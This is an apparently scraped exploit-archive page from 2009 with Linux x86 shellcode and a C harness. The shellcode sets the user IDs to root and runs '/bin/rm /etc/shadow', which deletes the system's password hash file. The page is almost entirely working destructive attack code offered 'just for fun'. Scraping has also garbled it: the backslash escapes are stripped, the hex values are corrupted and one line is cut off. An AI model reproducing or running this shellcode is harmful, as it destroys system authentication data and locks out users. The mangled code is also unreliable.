[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux - setreuid (0,0) & execve(/bin/rm /etc/shadow)
# Published : 2009-12-19
# Author : mr_me
# Previous Title : Win32 XP SP3 ShellExecuteA shellcode
# Next Title : Linux - setuid(0) & execve("/sbin/poweroff -f")
/*
rmtheshadow.c
by mr_me
Just for fun :)
visit: http://www.corelan.be:8800/
*/
#include <stdio.h>
#include <string.h>
char sc[] =
"x31xc0" // xor %eax,%eax
"xb0x46" // mov $0�46,%al
"x31xdb" // xor %ebx,%ebx
"x31xc9" // xor %ecx,%ecx
"xcdx80" // int $0�80
"x31xc0" // xor %eax,%eax
"x50" // push %eax
"x68x2fx2fx72x6d" // push $0�6d722f2f
"x68x2fx62x69x6e" // push $0�6e69622f
"x89xe3" // mov %esp,%ebx
"x50" // push %eax
"x68x61x64x6fx77" // push $0�776f6461
"x68x2fx2fx73x68" // push $0�68732f2f
"x68x2fx65x74x63" // push $0�6374652f
"x89xe1" // mov %esp,%ecx
"x50" // push %eax
"x51" // push %ecx
"x53" // push %ebx
"x89xe1" // mov %esp,%ecx
"xb0x0b" // mov $0xb,%al
"xcdx80"; // int $0�80
main()
{
printf("Linux � setreuid (0,0) & execve(/bin/rm /etc/shadow)ncoded by: mr_$
printf("Length of shellcode: %dn",strlen(sc));
(*(void(*) ()) sc)();
}